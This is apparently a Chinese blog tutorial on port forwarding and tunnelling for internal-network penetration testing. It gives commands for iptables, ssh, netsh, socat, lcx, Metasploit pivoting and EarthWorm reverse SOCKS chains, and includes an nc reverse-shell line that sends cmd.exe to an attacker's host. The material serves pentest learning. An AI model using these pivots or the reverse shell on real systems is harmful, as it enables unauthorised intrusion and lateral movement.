【渗透测试】内网渗透中的端口转发

李志宽
• 阅读 2735

【渗透测试】内网渗透中的端口转发

一、内网渗透中的端口转发

需要知道,在渗透的整个流程中,根据web应用或者开放的端口进行渗透,获取webshell只是渗透这门艺术的一小部分,在真实的错综复杂的企业环境中进行内网渗透,其实水很深,涉及内网穿透,端口转发,域渗透,提权等一系列的难题。所以这篇文章对内网渗透学习进行一些记录。在这过程中参考了很多前辈们的宝贵经验,我把这些链接进行了收集,放在参考文献部分。

二、转发,映射,代理

这几个概念其实是比较难区分的,特别是和后面的内网穿透混在一起,在宏观上说,他们差别不大。但是究其本质还是存在不小的差别的。现在就先对这几个概念说一下我个人的理解:

转发:转发是渗透中一种手段,是将一个网络端口从一个网络节点转发到另一个节点的行为。结果是使一个外网用户经过一个NAT路由器到达在内网IP地址某个端口。有时候也被称为隧道。

映射:映射也是渗透中的一种手段,端口映射就是将外网主机的IP地址的一个端口映射到内网中一台机器,提供相应的服务。其实很多时候转发和映射

代理:代理是一种结果,以端口转发和映射为技术基础。代理在很多场合是用在连接互联网的web服务上面,起到突破ip封锁,隐匿身份等作用。其原理是动态的端口转发。只需要本机和代理间建立一个隧道,然后代理就可以根据本机发起的请求去动态的获取出链的地址与端口。

内网穿透:内网穿透是目的,它使用的手段有包括端口转发和映射,或者直接使用代理这一结果。很多时候我们指的内网穿透场景是指攻击机与靶机处于处于不同的内网中,一些回弹shell之类的手段直接实现,因为IP地址无法相互建立连接。这个时候就需要使用一些内网穿透常见的工具。这些工具也是使用端口转发和映射或类似的方法来突破限制。 【渗透测试】内网渗透中的端口转发

三、系统内置的转发工具

iptables NAT功能

由于linux主机出于安全考虑,系统参数/proc/sys/net/ipv4/ip_forward默认为0,所以是禁止NAT功能的,我们可以通过以下两种你方式修改系统运行时的参数。

临时方案

1echo 1 >/proc/sys/net/ipv4/ip_forward

长期方案

运行vi /etc/sysctl.conf

1# 找到下面的值并将0改成1
2
3net.ipv4.ip_forward = 1

运行sysctl –p,使改动立即生效 。

下面是一个转发的示例

# 1.1.1.1是公网ip,192.168.2.2内网ip
2iptables -t nat -A PREROUTING  -p tcp -d 1.1.1.1 --dport 80 -j DNAT --to-destination 192.168.2.2:8080
3
4iptables -t nat -A POSTROUTING -p tcp -s 192.168.2.2 --sport 8080 -j SNAT --to-source 1.1.1.1
5
6service iptables save

这样就会使得访问1.1.1.1:80 映射到了192.168.2.2:8080端口。注意到这里

nc

# 公网主机
2nc -lvp 4444
3
4# 内网机器
5nc -t -e cmd.exe 公网主机ip 4444

SSH

 1#本地端口转发:
 2ssh -CfNg -L port1:127.0.0.1:port2 user@host 
 3参数: -L 本地网卡地址:本地端口:目标地址:目标端口
 4
 5#远程端口转发: 
 6ssh -CfNg -R port2:127.0.0.1:port1 user@hsst
 7参数: -R 远程网卡地址:远程端口:目标地址:目标端口
 8
 9#动态端口转发
10ssh -D localhost:2000 root@103.59.22.17
11参数:-D 本地网卡地址:本地端口

netsh

netsh是windows下提供网络管理的命令行工具,它是一个交互式的shell,涉及到上下文的概念。我们在交互式下面进入相应的上下文,进行参数的设置。也可以直接下面这样非交互式的进行端口转发。

1netsh  interface ipv6 install
2#转发
3netsh interface portproxy add v4tov4 listenaddress=10.10.18.1 listenport=4455 connectaddress=10.10.12.1  connectport=8080
4
5#删除转发
6netsh interface portproxy delete v4tov4 listenaddress={B的IP}  listenport={B的端口}

【渗透测试】内网渗透中的端口转发

四、非内置的端口转发工具

socat

socat这个端口转发我们其实更常用在ssrf构造payload的时候本地抓包,因为socat有记录转发流的功能。将socat作为中介捕获我们构造的payload包,然后进行进一步的操作,如gopher协议的构造。

1#安装
 2yum install -y socat
 3apt install -y socat 
 4
 5#TCP 
 6nohup socat TCP4-LISTEN:10000,reuseaddr,fork TCP4:1.1.1.1:10000
 7
 8TCP4-LISTEN:10000  监听 ipv4 的 10000TCP 端口。 10000 改成你自己需要转发的端口
 9fork TCP4:1.1.1.1:10000  转发到 1.1.1.1 的 10000 端口,根据需求修改自行修改 ip 和端口
10nohup 后台运行。可以把这个命令写到   /etc/rc.local 里面开机启动启动。
11
12#UDP
13nohup socat -T 600 UDP4-LISTEN:10000,reuseaddr,fork UDP4:1.1.1.1:10000

lcx.exe

 1lcx-<listen|tran|slave> <option> [-log logfile]
 2[option:]
 3
 4 -listen <监听端口> <转发端口> 
 5
 6 -tran<监听端口> <目标地址> <目标端口>
 7
 8 -slave <目标主机> <目标端口> <本地主机><本机端口>
 9
10
11内网机器上执行:
12lcx.exe –slave 公网IP +端口 内网IP +端口
13例: 
14lcx.exe –slave 192.168.43.142 51 192.168.43.137 3389
15公网上执行:
16Lcx.exe –listen 监听51端口,转发到公网机器的3389端口
17例: 
18Lcx.exe –listen 51 3389

Metasploit socks4a

一组在实际渗透过程中的三件套:路由表+socks4a+proxychains。这样一来可以使用攻击机上的渗透工具,利用meterpreter session作为跳板,对内网进行渗透。下面的是流程。

11. 在反弹的shell中添加路由,如
2run autoroute -s 192.168.122.0/24
32. 使用socks4a模块并设置端口
4use auxiliary/server/socks4a
53. 配置proxychains

Meterpreter portfwd

在MSF渗透框架里面内置了端口转发的命令,在回弹了shell的条件下可以直接使用,下面式相关参数解析。

1meterpreter > portfwd -h
 2Usage: portfwd [-h] [add | delete | list | flush] [args]
 3
 4
 5OPTIONS:
 6
 7    -L <opt>  转发: 本地监听地址  反向: 本地主机连接到某个地址
 8    -R        表示正向反向端口
 9    -h        帮助信息
10    -i <opt>  端口转发条目的索引与交互(请参阅“列表”命令)
11    -l <opt>  转发:本地端口收听  反向:本地端口连接
12    -p <opt>  转发:远程端口连接  反向:远程端口监听
13    -r <opt>  转发:连接到远程主机
14
15
16例子:
17portfwd -L 127.0.0.1 -l 1212 -r 10.10.12.1 -p 3389  

【渗透测试】内网渗透中的端口转发

Rinetd

 1# 安装,注意到centos没有其默认的软件源,需要手动导入;ubuntu的比较方便
 2#centos 32
 3$ vim /etc/yum.repos.d/nux-misc.repo
 4[nux-misc]
 5name=Nux Misc
 6baseurl=http://li.nux.ro/download/nux/misc/el6/i386/
 7enabled=0
 8gpgcheck=1
 9gpgkey=http://li.nux.ro/download/nux/RPM-GPG-KEY-nux.ro
10
11#centos 64
12$ vim  /etc/yum.repos.d/nux-misc.repo:
13
14[nux-misc]
15name=Nux Misc
16baseurl=http://li.nux.ro/download/nux/misc/el6/x86_64/
17enabled=0
18gpgcheck=1
19gpgkey=http://li.nux.ro/download/nux/RPM-GPG-KEY-nux.ro
20
21$ yum --enablerepo=nux-misc install rinetd
22
23# ubuntu
24$ apt-get install rinetd
25
26#配置文件在/etc/rinetd.conf,配置参数格式
27[bindaddress] [bindport] [connectaddress] [connectport]
28绑定的地址    绑定的端口  连接的地址      连接的端口
29
30[Source Address] [Source Port] [Destination Address] [Destination Port]
31源地址            源端口         目的地址               目的端口
32
33#举例
34$ vim /etc/rinetd.conf
35
360.0.0.0 8080 172.19.94.3 8080
370.0.0.0 2222 192.168.0.103 3389
381.2.3.4 80 192.168.0.10 80
39allow *.*.*.*
40logfile /var/log/rinetd.log
41
42#解释
430.0.0.0表示本机绑定所有可用地址
44将所有发往本机8080端口的请求转发到172.19.94.3的8080端口
45将所有发往本机2222端口的请求转发到192.168.0.103的3389端口
46将所有发往1.2.3.4的80端口请求转发到192.168.0.10的80端口
47allow设置允许访问的ip地址信息,*.*.*.*表示所有IP地址
48logfil设置打印的log的位置
49
50# 运行
51#脚本启动
52$ /etc/init.d/rinetd start
53
54#二进制启动
55$ /usr/sbin/rinetd -c /etc/rinetd.conf
56
57#关闭(使用脚本,或则和pkill)
58$ /etc/init.d/rinetd stop

Tunna 与 reGeorg

这两个工具的使用都是比较简单,就不啰嗦了,在获取webshell后,我们可以通过http进行端口转发。直接给出两个项目地址,推荐使用reGeorg,Tunna不稳定。Tunna工具地址

Localtunnel与Gnork

这两个工具都可以将内网的端口映射到公网,然后访问公网的ip就类似于访问内网的端口。这两个工具可以提供自建服务或者使用它提供的服务器进行内网穿透。其实这类工具在实际渗透中不是很常用。更直接的场景是自己攻击机在内网,在进行相关回连操作的时候,需要目标机器可达,毕竟它们只是一级转发,而且操作麻烦。直接给出项目地址

https://github.com/localtunnel/localtunnel

https://ngrok.com/

EW

工具的地址:http://rootkiter.com/EarthWorm/

这是个国产的打洞神器,因为其方便的多级转发,支持反向代理等特性,在内网渗透领域可是响当当的。这里重点对这个工具做下记录,真的太强大了

该工具共有 6 种命令格式(ssocksd、rcsocks、rssocks、lcx_slave、lcx_listen、lcx_tran)。下面针对官方的例子进行以下解释:

正向代理

1$ ./ew -s ssocksd -l 1080

开启机器的1080端口做正向代理,我们可以通过链接该机器的1080端口进行端口代理转发。一般的场景为:kali 通过proxychain 链接开启了正向代理的公网ip。

反响代理

1#公网ip主机A,ip假设为1.1.1.1
2./ew -s rcsocks -l 1080 -e 8888 
3
4# 目标机B
5./ew -s rssocks -d 1.1.1.1 -e 8888

反向代理是目标机向我们发起链接请求,与正向代理是不一样的。当建立了链接后,它的代理流如下Me<--->A<--->B。即我只要连接A的1080端口就可以获得一条反向代理的隧道,与B建立连接。这种场景可以用来绕过入口策略严格但是出口策略松散的防火墙。

多级转发

在前面的两个场景中,我们看到了rcsocks,`ssocksd,rssocks这三个命令的使用。在多级转发中我们会见到另外三个命令的作用。他们就类似于中间件,负责隧道导流与串接。

1#命令使用举例:
2# lcx_listen 用在将本机的端口进行转发
3$ ./ew -s lcx_listen -l  1080   -e 8888
4# lcx_tran 将本机端口与目的ip地址的端口进行转发
5$ ./ew -s lcx_tran   -l  1080   -f 2.2.2.3 -g 9999
6# lcx_slave 作为奴隶,将本机直接可达的两个主机实体上的端口进行转发
7$ ./ew -s lcx_slave  -d 1.1.1.1 -e 8888    -f 2.2.2.3  -g  9999

下面我们来看个实际渗透三级级联例子:

 1# 我们自己的VPS执行
 2$ ./ew -s rcsocks -l 1080 -e 8888
 3
 4# 跳板机A执行
 5$ ./ew -s lcx_slave -d ip_A -e 8888 -f ip_B -g 9999
 6
 7# 跳板机B执行
 8$ ./ew -s lcx_listen -l 9999 -e 7777
 9
10# 跳板机C执行
11$ ./ew -s rssocks -d ip_B -e 7777

数据流向: SOCKS v5 -> 1080 -> 8888 -> 9999 -> 7777 -> rssocks。

我们来解读以下这个三级级联,首先这是个反向代理的例子,反向代理的目的端口是C的7777,当隧道建立完成,我们只需要连接到VPS的1080端口,就会自动帮我们转发到7777。我们来看下中间过程如何:首先第一个命令VPS在8888接收反向代理,并且在1080等候我们的连接。第二条命令将跳板机A的8888端口导向9999;第三行命令将跳板机B的9999端口导向7777;最后第四条命令在跳板机上进行反向代理发起连接到跳板机B的7777端口。

FRP

frp也提供了完善的内网穿透的功能,功能上其实和gnork这些差不多,但是相比起来,FRP的配置更为灵活。推荐层度:FRP>Localtunnel>gnork 【渗透测试】内网渗透中的端口转发

五、过墙隧道

前面介绍的端口转发,有使用http协议,tcp协议,sockts代理的,但是这些协议转发流量太过于碍眼,容易被严谨的防火墙规则过滤,导致shell从内网出不来,那么在这种情况下,我们就需要强有力的过墙隧道。下面是笔者在网上搜罗的一些走udp的dns隧道和走icmp的隧道,可以说这两种打洞手段很别出心裁,笔者看得是叹为观止。这里先把相关的工具链接和看过的资料记录下来。写不动了……,避免篇幅过长(其实是有点懒),下次补上。 ↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓

【参考资料&工具分享】

【渗透测试】内网渗透中的端口转发

点赞
收藏
评论区
推荐文章
blmius blmius
3年前
MySQL:[Err] 1292 - Incorrect datetime value: ‘0000-00-00 00:00:00‘ for column ‘CREATE_TIME‘ at row 1
文章目录问题用navicat导入数据时,报错:原因这是因为当前的MySQL不支持datetime为0的情况。解决修改sql\mode:sql\mode:SQLMode定义了MySQL应支持的SQL语法、数据校验等,这样可以更容易地在不同的环境中使用MySQL。全局s
皕杰报表之UUID
​在我们用皕杰报表工具设计填报报表时,如何在新增行里自动增加id呢?能新增整数排序id吗?目前可以在新增行里自动增加id,但只能用uuid函数增加UUID编码,不能新增整数排序id。uuid函数说明:获取一个UUID,可以在填报表中用来创建数据ID语法:uuid()或uuid(sep)参数说明:sep布尔值,生成的uuid中是否包含分隔符'',缺省为
Jacquelyn38 Jacquelyn38
3年前
2020年前端实用代码段,为你的工作保驾护航
有空的时候,自己总结了几个代码段,在开发中也经常使用,谢谢。1、使用解构获取json数据let jsonData  id: 1,status: "OK",data: 'a', 'b';let  id, status, data: number   jsonData;console.log(id, status, number )
Easter79 Easter79
3年前
Twitter的分布式自增ID算法snowflake (Java版)
概述分布式系统中,有一些需要使用全局唯一ID的场景,这种时候为了防止ID冲突可以使用36位的UUID,但是UUID有一些缺点,首先他相对比较长,另外UUID一般是无序的。有些时候我们希望能使用一种简单一些的ID,并且希望ID能够按照时间有序生成。而twitter的snowflake解决了这种需求,最初Twitter把存储系统从MySQL迁移
Wesley13 Wesley13
3年前
mysql设置时区
mysql设置时区mysql\_query("SETtime\_zone'8:00'")ordie('时区设置失败,请联系管理员!');中国在东8区所以加8方法二:selectcount(user\_id)asdevice,CONVERT\_TZ(FROM\_UNIXTIME(reg\_time),'08:00','0
Wesley13 Wesley13
3年前
00:Java简单了解
浅谈Java之概述Java是SUN(StanfordUniversityNetwork),斯坦福大学网络公司)1995年推出的一门高级编程语言。Java是一种面向Internet的编程语言。随着Java技术在web方面的不断成熟,已经成为Web应用程序的首选开发语言。Java是简单易学,完全面向对象,安全可靠,与平台无关的编程语言。
Stella981 Stella981
3年前
Django中Admin中的一些参数配置
设置在列表中显示的字段,id为django模型默认的主键list_display('id','name','sex','profession','email','qq','phone','status','create_time')设置在列表可编辑字段list_editable
Wesley13 Wesley13
3年前
MySQL部分从库上面因为大量的临时表tmp_table造成慢查询
背景描述Time:20190124T00:08:14.70572408:00User@Host:@Id:Schema:sentrymetaLast_errno:0Killed:0Query_time:0.315758Lock_
为什么mysql不推荐使用雪花ID作为主键
作者:毛辰飞背景在mysql中设计表的时候,mysql官方推荐不要使用uuid或者不连续不重复的雪花id(long形且唯一),而是推荐连续自增的主键id,官方的推荐是auto_increment,那么为什么不建议采用uuid,使用uuid究
Python进阶者 Python进阶者
10个月前
Excel中这日期老是出来00:00:00,怎么用Pandas把这个去除
大家好,我是皮皮。一、前言前几天在Python白银交流群【上海新年人】问了一个Pandas数据筛选的问题。问题如下:这日期老是出来00:00:00,怎么把这个去除。二、实现过程后来【论草莓如何成为冻干莓】给了一个思路和代码如下:pd.toexcel之前把这
李志宽
李志宽
Lv1
男 · 长沙幻音科技有限公司 · 网络安全工程师
李志宽、前百创作者、渗透测试专家、闷骚男一位、有自己的摇滚乐队
文章
89
粉丝
25
获赞
43